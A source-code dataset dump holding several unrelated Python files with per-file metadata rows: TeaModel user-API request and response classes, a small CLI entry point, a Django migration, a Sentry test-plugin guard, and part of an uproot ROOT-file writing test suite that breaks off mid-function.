        self.nick_name = nick_name
        # phone number
        self.phone = phone
        # role
        self.role = role
        # user status
        self.status = status
        # user last-modified time
        self.updated_at = updated_at
        # user-defined JSON data; usable for config items or small transient
        # data; at most 1 KB
        self.user_data = user_data
        # user ID
        self.user_id = user_id
        # user name
        self.user_name = user_name

    def validate(self):
        pass

    def to_map(self):
        # Emit only the attributes that are set, preserving field order.
        result = dict()
        for key in self._FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class ListUserResponse(TeaModel):
    """
    List user response
    """

    def __init__(
        self,
        items: List[BaseUserResponse] = None,
        next_marker: str = None,
    ):
        # one BaseUserResponse per user in this page
        self.items = items
        # paging marker
        self.next_marker = next_marker

    def validate(self):
        if self.items:
            for entry in self.items:
                if entry:
                    entry.validate()

    def to_map(self):
        result = dict()
        # 'items' is always emitted (possibly empty), each entry as a
        # nested map.
        result['items'] = []
        if self.items is not None:
            for entry in self.items:
                result['items'].append(entry.to_map() if entry else None)
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        # 'items' is unconditionally reset, then rebuilt from nested maps.
        self.items = []
        if m.get('items') is not None:
            for entry in m.get('items'):
                self.items.append(BaseUserResponse().from_map(entry))
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class ListUsersModel(TeaModel):
    """Response wrapper: HTTP headers plus a ListUserResponse body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListUserResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is required, and must itself be valid.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            # Nested model serializes to its own map.
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = ListUserResponse().from_map(m['body'])
        return self
class SearchUserModel(TeaModel):
    """Response wrapper for user search: headers plus a ListUserResponse body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListUserResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is required, and must itself be valid.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            # Nested model serializes to its own map.
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = ListUserResponse().from_map(m['body'])
        return self
class UpdateUserResponse(TeaModel):
    """
    Update user response
    """

    # Serializable attribute names, in wire order.
    _FIELDS = (
        'avatar', 'created_at', 'default_drive_id', 'description',
        'domain_id', 'email', 'nick_name', 'phone', 'role', 'status',
        'updated_at', 'user_data', 'user_id', 'user_name',
    )

    def __init__(
        self,
        avatar: str = None,
        created_at: int = None,
        default_drive_id: str = None,
        description: str = None,
        domain_id: str = None,
        email: str = None,
        nick_name: str = None,
        phone: str = None,
        role: str = None,
        status: str = None,
        updated_at: int = None,
        user_data: dict = None,
        user_id: str = None,
        user_name: str = None,
    ):
        # avatar
        self.avatar = avatar
        # user creation time
        self.created_at = created_at
        # default Drive ID
        self.default_drive_id = default_drive_id
        # user remarks
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # email address
        self.email = email
        # nickname
        self.nick_name = nick_name
        # phone number
        self.phone = phone
        # role
        self.role = role
        # user status
        self.status = status
        # user last-modified time
        self.updated_at = updated_at
        # user-defined JSON data; usable for config items or small transient
        # data; at most 1 KB
        self.user_data = user_data
        # user ID
        self.user_id = user_id
        # user name
        self.user_name = user_name

    def validate(self):
        pass

    def to_map(self):
        # Emit only the attributes that are set, preserving field order.
        result = dict()
        for key in self._FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class UpdateUserModel(TeaModel):
    """Response wrapper: HTTP headers plus an UpdateUserResponse body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: UpdateUserResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is required, and must itself be valid.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            # Nested model serializes to its own map.
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = UpdateUserResponse().from_map(m['body'])
        return self
class CreateUserRequest(TeaModel):
    """
    Create user request
    """

    # Serializable attribute names, in wire order (after 'headers').
    _FIELDS = (
        'avatar', 'description', 'email', 'location', 'nick_name', 'phone',
        'role', 'status', 'user_data', 'user_id', 'user_name',
    )

    def __init__(
        self,
        headers: Dict[str, str] = None,
        avatar: str = None,
        description: str = None,
        email: str = None,
        location: str = None,
        nick_name: str = None,
        phone: str = None,
        role: str = None,
        status: str = None,
        user_data: dict = None,
        user_id: str = None,
        user_name: str = None,
    ):
        self.headers = headers
        # avatar
        self.avatar = avatar
        # description (validated to at most 1024 characters)
        self.description = description
        # email address
        self.email = email
        # user region
        self.location = location
        # nickname
        self.nick_name = nick_name
        # phone number
        self.phone = phone
        # role
        self.role = role
        # status
        self.status = status
        # user-defined JSON data; usable for config items or small transient
        # data; at most 1 KB
        self.user_data = user_data
        # user ID (required)
        self.user_id = user_id
        # user name
        self.user_name = user_name

    def validate(self):
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)
        self.validate_required(self.user_id, 'user_id')

    def to_map(self):
        # Emit only the attributes that are set, preserving field order.
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        for key in self._FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        for key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class DeleteUserRequest(TeaModel):
    """
    Delete user request
    """

    def __init__(
        self,
        headers: Dict[str, str] = None,
        user_id: str = None,
    ):
        self.headers = headers
        # user ID (required)
        self.user_id = user_id

    def validate(self):
        self.validate_required(self.user_id, 'user_id')

    def to_map(self):
        result = dict()
        for key, value in (('headers', self.headers),
                           ('user_id', self.user_id)):
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('headers', 'user_id'):
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class DeleteUserResponse(TeaModel):
    """
    Delete user response
    """

    # The delete operation carries no payload; this model is intentionally
    # empty but keeps the TeaModel interface.
    def __init__(self):
        pass

    def validate(self):
        pass

    def to_map(self):
        # No fields: always serializes to an empty map.
        return dict()

    def from_map(self, m: dict = None):
        m = m or dict()
        return self
class GetUserRequest(TeaModel):
    """
    Get user request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        user_id: str = None,
    ):
        self.headers = headers
        # User ID. Required when accessing via AK; when accessing via
        # access_token and omitted, the caller's own user info is returned.
        # NOTE: the generated source contained a stray bare name `example`
        # here, which raised NameError the moment this class body executed;
        # it has been removed.
        self.user_id = user_id
    def validate(self):
        pass
    def to_map(self):
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.user_id is not None:
            result['user_id'] = self.user_id
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('user_id') is not None:
            self.user_id = m.get('user_id')
        return self
class ListUserRequest(TeaModel):
    """
    List user request
    """

    def __init__(
        self,
        headers: Dict[str, str] = None,
        limit: int = None,
        marker: str = None,
    ):
        self.headers = headers
        # page size limit (1..100)
        self.limit = limit
        # paging marker
        self.marker = marker

    def validate(self):
        # limit, when present, must be in [1, 100].
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)

    def to_map(self):
        result = dict()
        for key, value in (('headers', self.headers),
                           ('limit', self.limit),
                           ('marker', self.marker)):
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('headers', 'limit', 'marker'):
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class SearchUserRequest(TeaModel):
    """
    Search user request
    """

    # Serializable attribute names, in wire order (after 'headers').
    _FIELDS = ('email', 'limit', 'marker', 'nick_name', 'phone',
               'role', 'status', 'user_name')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        email: str = None,
        limit: int = None,
        marker: str = None,
        nick_name: str = None,
        phone: str = None,
        role: str = None,
        status: str = None,
        user_name: str = None,
    ):
        self.headers = headers
        # email address
        self.email = email
        # page size limit (1..100)
        self.limit = limit
        # paging marker
        self.marker = marker
        # nickname
        self.nick_name = nick_name
        # phone number
        self.phone = phone
        # role
        self.role = role
        # status
        self.status = status
        # user name
        self.user_name = user_name

    def validate(self):
        # limit, when present, must be in [1, 100].
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)

    def to_map(self):
        # Emit only the attributes that are set, preserving field order.
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        for key in self._FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        for key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class UpdateUserRequest(TeaModel):
    """
    Update user request
    """

    # Serializable attribute names, in wire order (after 'headers').
    _FIELDS = ('avatar', 'description', 'email', 'nick_name', 'phone',
               'role', 'status', 'user_data', 'user_id')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        avatar: str = None,
        description: str = None,
        email: str = None,
        nick_name: str = None,
        phone: str = None,
        role: str = None,
        status: str = None,
        user_data: dict = None,
        user_id: str = None,
    ):
        self.headers = headers
        # avatar
        self.avatar = avatar
        # description (validated to at most 1024 characters)
        self.description = description
        # email address
        self.email = email
        # nickname
        self.nick_name = nick_name
        # phone number
        self.phone = phone
        # role
        self.role = role
        # status
        self.status = status
        # user-defined JSON data; usable for config items or small transient
        # data; at most 1 KB
        self.user_data = user_data
        # user ID (required)
        self.user_id = user_id

    def validate(self):
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)
        self.validate_required(self.user_id, 'user_id')

    def to_map(self):
        # Emit only the attributes that are set, preserving field order.
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        for key in self._FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        for key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
| 33.999906
| 114
| 0.577791
| 96,101
| 723,620
| 4.132049
| 0.012133
| 0.053262
| 0.095872
| 0.06911
| 0.919498
| 0.891577
| 0.879583
| 0.868308
| 0.857346
| 0.849993
| 0
| 0.002987
| 0.319973
| 723,620
| 21,282
| 115
| 34.001504
| 0.803981
| 0
| 0
| 0.900615
| 1
| 0
| 0.097707
| 0.008903
| 0
| 0
| 0
| 0
| 0.000348
| 0
| null | null | 0.005972
| 0.000116
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
76401e156af9f0ddfb4345eb516b9a0880583194
| 120
|
py
|
Python
|
console_alarm/command_line.py
|
ruerob/console_alarm
|
2aa23f07acdf6a3e4fb677f1662122677de6ba13
|
[
"Unlicense"
] | null | null | null |
console_alarm/command_line.py
|
ruerob/console_alarm
|
2aa23f07acdf6a3e4fb677f1662122677de6ba13
|
[
"Unlicense"
] | null | null | null |
console_alarm/command_line.py
|
ruerob/console_alarm
|
2aa23f07acdf6a3e4fb677f1662122677de6ba13
|
[
"Unlicense"
] | null | null | null |
import sys
from console_alarm import console_alarm
def main():
    """Console-script entry point: forward the raw CLI argv to console_alarm."""
    argv = sys.argv
    console_alarm.console_script_entry_point(argv)
| 17.142857
| 54
| 0.816667
| 18
| 120
| 5.111111
| 0.611111
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 6
| 55
| 20
| 0.87619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76486481ab20111b01f2ab2b96ef06cd4028e552
| 2,777
|
py
|
Python
|
assessment/migrations/0009_auto_20190125_1724.py
|
kenware/Assessment
|
69f5e3fbf18dfa2c59eaf3b083ebdba7ca66c9b7
|
[
"MIT"
] | null | null | null |
assessment/migrations/0009_auto_20190125_1724.py
|
kenware/Assessment
|
69f5e3fbf18dfa2c59eaf3b083ebdba7ca66c9b7
|
[
"MIT"
] | 3
|
2020-02-11T23:31:01.000Z
|
2021-06-10T21:04:34.000Z
|
assessment/migrations/0009_auto_20190125_1724.py
|
kenware/Assessment
|
69f5e3fbf18dfa2c59eaf3b083ebdba7ca66c9b7
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.4 on 2019-01-25 17:24
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: normalize timestamp fields on the assessment models."""

    dependencies = [
        ('assessment', '0008_auto_20190125_1249'),
    ]

    # One AlterField per (model, field, field definition) — the created_at
    # defaults keep the exact timestamp baked in by the generator.
    operations = [
        migrations.AlterField(
            model_name=model_name,
            name=field_name,
            field=field,
        )
        for model_name, field_name, field in [
            ('answer', 'created_at', models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346))),
            ('answer', 'deleted_at', models.DateTimeField(blank=True, null=True)),
            ('answer', 'updated_at', models.DateTimeField(blank=True, null=True)),
            ('assessment', 'created_at', models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346))),
            ('assessment', 'deleted_at', models.DateTimeField(blank=True, null=True)),
            ('assessment', 'updated_at', models.DateTimeField(blank=True, null=True)),
            ('question', 'created_at', models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346))),
            ('question', 'deleted_at', models.DateTimeField(blank=True, null=True)),
            ('question', 'updated_at', models.DateTimeField(blank=True, null=True)),
            ('score', 'created_at', models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346))),
            ('score', 'deleted_at', models.DateTimeField(blank=True, null=True)),
            ('score', 'end_time', models.DateTimeField(blank=True, null=True)),
            ('score', 'start_time', models.DateTimeField(blank=True, null=True)),
            ('score', 'updated_at', models.DateTimeField(blank=True, null=True)),
        ]
    ]
| 32.670588
| 99
| 0.559957
| 265
| 2,777
| 5.750943
| 0.181132
| 0.183727
| 0.229659
| 0.266404
| 0.885171
| 0.885171
| 0.839239
| 0.839239
| 0.839239
| 0.839239
| 0
| 0.056644
| 0.31977
| 2,777
| 84
| 100
| 33.059524
| 0.750132
| 0.016205
| 0
| 0.871795
| 1
| 0
| 0.098169
| 0.008425
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.064103
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
767201f19522323aa582e32d3263ff2de7393faa
| 154
|
py
|
Python
|
src/test_only_plugins/bitbucket/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/bitbucket/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/bitbucket/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
# Guard module for the test-only bitbucket plugin stub.
# Importing this package asserts that the real "sentry-bitbucket"
# distribution is NOT installed, so the stub cannot collide with
# (or silently mask) a genuine installation during test runs.
from __future__ import absolute_import
from test_only_plugins.base import assert_package_not_installed
assert_package_not_installed("sentry-bitbucket")
| 25.666667
| 63
| 0.88961
| 21
| 154
| 5.904762
| 0.666667
| 0.209677
| 0.258065
| 0.403226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 154
| 5
| 64
| 30.8
| 0.867133
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
96ee17a450f73310d5769d1d982cc3a4d337b28a
| 38,252
|
py
|
Python
|
tests/test_write.py
|
oshadura/uproot
|
5be40b068155dab444c69ecec4998ffb0fcf3384
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_write.py
|
oshadura/uproot
|
5be40b068155dab444c69ecec4998ffb0fcf3384
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_write.py
|
oshadura/uproot
|
5be40b068155dab444c69ecec4998ffb0fcf3384
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot/blob/master/LICENSE
from os.path import join
import pytest
import uproot
ROOT = pytest.importorskip("ROOT")
def test_strings(tmp_path):
    """Write a plain string with uproot and read it back through ROOT."""
    out_path = join(str(tmp_path), "example.root")
    with uproot.recreate(out_path, compression=None) as out:
        out["hello"] = "world"
    rootfile = ROOT.TFile.Open(out_path)
    assert str(rootfile.Get("hello")) == "world"
    rootfile.Close()
def test_cycle(tmp_path):
    """Writing the same key twice produces two ROOT cycles (hello;1, hello;2)."""
    out_path = join(str(tmp_path), "example.root")
    with uproot.recreate(out_path, compression=None) as out:
        out["hello"] = "world"
        out["hello"] = "uproot"
    rootfile = ROOT.TFile.Open(out_path)
    assert str(rootfile.Get("hello;1")) == "world"
    assert str(rootfile.Get("hello;2")) == "uproot"
    rootfile.Close()
def test_zlib(tmp_path):
    """A ZLIB(1)-compressed file reports the right algorithm/level to ROOT."""
    out_path = join(str(tmp_path), "example.root")
    payload = "a" * 2000  # long enough that compression actually kicks in
    with uproot.recreate(out_path, compression=uproot.ZLIB(1)) as out:
        out["hello"] = payload
    rootfile = ROOT.TFile.Open(out_path)
    assert rootfile.GetCompressionAlgorithm() == uproot.const.kZLIB
    assert rootfile.GetCompressionLevel() == 1
    assert str(rootfile.Get("hello")) == payload
    rootfile.Close()
def test_compresschange(tmp_path):
    """Changing ``f.compression`` after recreate() must govern later writes.

    The file is created with ZLIB(2) but switched to ZLIB(3) before the
    first write, so ROOT must report compression level 3.
    """
    filename = join(str(tmp_path), "example.root")
    with uproot.recreate(filename, compression=uproot.ZLIB(2)) as f:
        f.compression = uproot.ZLIB(3)
        f["hello"] = "a"*2000
    f = ROOT.TFile.Open(filename)
    assert f.GetCompressionAlgorithm() == uproot.const.kZLIB
    assert f.GetCompressionLevel() == 3
    # Fix: this test leaked the open TFile; every sibling test closes it.
    f.Close()
def test_nocompress(tmp_path):
    """compression=None must yield an uncompressed file (factor == 1)."""
    out_path = join(str(tmp_path), "example.root")
    payload = "a" * 2000
    with uproot.recreate(out_path, compression=None) as out:
        out["hello"] = payload
    rootfile = ROOT.TFile.Open(out_path)
    assert rootfile.GetCompressionFactor() == 1
    assert str(rootfile.Get("hello")) == payload
    rootfile.Close()
def test_lzma(tmp_path):
    """An LZMA(1)-compressed file reports the right algorithm/level to ROOT."""
    out_path = join(str(tmp_path), "example.root")
    payload = "a" * 2000
    with uproot.recreate(out_path, compression=uproot.LZMA(1)) as out:
        out["hello"] = payload
    rootfile = ROOT.TFile.Open(out_path)
    assert rootfile.GetCompressionAlgorithm() == uproot.const.kLZMA
    assert rootfile.GetCompressionLevel() == 1
    assert str(rootfile.Get("hello")) == payload
    rootfile.Close()
def test_lz4_leveldown(tmp_path):
    """LZ4-compressed payload reads back intact through ROOT."""
    out_path = join(str(tmp_path), "example.root")
    payload = "a" * 2000
    with uproot.recreate(out_path, compression=uproot.LZ4(5)) as out:
        out["hello"] = payload
    rootfile = ROOT.TFile.Open(out_path)
    assert rootfile.GetCompressionAlgorithm() == uproot.const.kLZ4
    assert str(rootfile.Get("hello")) == payload
    rootfile.Close()
def test_lz4_levelup(tmp_path):
    """LZ4(5) round trip: algorithm, level, and payload all preserved."""
    out_path = join(str(tmp_path), "example.root")
    payload = "a" * 2000
    with uproot.recreate(out_path, compression=uproot.LZ4(5)) as out:
        out["hello"] = payload
    rootfile = ROOT.TFile.Open(out_path)
    assert rootfile.GetCompressionAlgorithm() == uproot.const.kLZ4
    assert rootfile.GetCompressionLevel() == 5
    assert str(rootfile.Get("hello")) == payload
    rootfile.Close()
def test_th1(tmp_path):
    """Copy a ROOT-made TH1F through uproot's writer; verify it in ROOT."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    # Build the reference histogram with ROOT: 5 bins on [1, 10], two
    # weighted fills that both land in bin 1.
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH1F("hvar", "title", 5, 1, 10)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 3)
    hist_in.Fill(2.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # Sumw2 has 5+2 slots (under/overflow); bin 1 holds 3^2 + 4^2 = 25.
    expected_sumw2 = [0.0, 25.0, 0.0, 0.0, 0.0, 0.0, 0.0]
    expected_bins = [7.0, 0.0, 0.0, 0.0, 0.0]
    assert list(readback.GetSumw2()) == expected_sumw2
    for index, expected in enumerate(expected_bins, start=1):
        assert readback.GetBinContent(index) == expected
    assert readback.GetNbinsX() == 5
    assert readback.GetMean() == 1.5714285714285714
    assert readback.GetRMS() == 0.4948716593053938
def test_th1_uproot(tmp_path):
    """The uproot-written copy of a TH1F is classified as a TH1 by uproot."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH1F("hvar", "title", 5, 1, 10)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 3)
    hist_in.Fill(2.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    assert "TH1" in uproot.open(out_path)["test"]._classname.decode("utf-8")
def test_th1_varbin(tmp_path):
    """Variable-width TH1F binning survives the uproot round trip."""
    import numpy as np
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    edges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH1F("hvar", "title", 5, edges)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    assert readback.GetNbinsX() == 5
    # Widths are successive differences of `edges`.
    for index, width in enumerate([2.0, 1.0, 6.0, 1.0, 1.0], start=1):
        assert readback.GetBinWidth(index) == width
def test_compressed_th1(tmp_path):
    """Variable-width TH1F round trip, this time through a ZLIB(1) file."""
    import numpy as np
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    edges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH1F("hvar", "title", 5, edges)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=uproot.ZLIB(1)) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    assert readback.GetNbinsX() == 5
    for index, width in enumerate([2.0, 1.0, 6.0, 1.0, 1.0], start=1):
        assert readback.GetBinWidth(index) == width
def test_th2(tmp_path):
    """Copy a ROOT-made TH2F through uproot's writer; verify it in ROOT."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH2F("hvar", "title", 5, 1, 10, 6, 1, 20)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3)
    hist_in.Fill(2.0, 10.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # Sumw2 has (5+2)*(6+2) = 56 slots (under/overflow included); the two
    # fills land at global bins 15 and 22 with squared weights 9 and 16.
    expected_sumw2 = [0.0] * 56
    expected_sumw2[15] = 9.0
    expected_sumw2[22] = 16.0
    # 5*6 in-range bins, scanned x-major below; fills sit at flat indices 1, 2.
    expected_bins = [0.0] * 30
    expected_bins[1] = 3.0
    expected_bins[2] = 4.0
    flat = 0
    for x in range(1, 6):
        for y in range(1, 7):
            assert readback.GetBinContent(x, y) == expected_bins[flat]
            flat += 1
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5714285714285714
    assert readback.GetRMS() == 0.4948716593053938
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
def test_th2_uproot(tmp_path):
    """The uproot-written copy of a TH2F is classified as a TH2 by uproot."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH2F("hvar", "title", 5, 1, 10, 6, 1, 20)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3)
    hist_in.Fill(2.0, 10.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    assert "TH2" in uproot.open(out_path)["test"]._classname.decode("utf-8")
def test_th2_varbin(tmp_path):
    """Variable-width binning on both TH2F axes survives the round trip."""
    import numpy as np
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    xedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
    yedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH2F("hvar", "title", 5, xedges, 6, yedges)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
def test_compressed_th2(tmp_path):
    """Variable-width TH2F round trip through a ZLIB(1)-compressed file."""
    import numpy as np
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    xedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
    yedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH2F("hvar", "title", 5, xedges, 6, yedges)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=uproot.ZLIB(1)) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
def test_th3(tmp_path):
    """Copy a ROOT-made TH3F through uproot's writer; verify it in ROOT."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
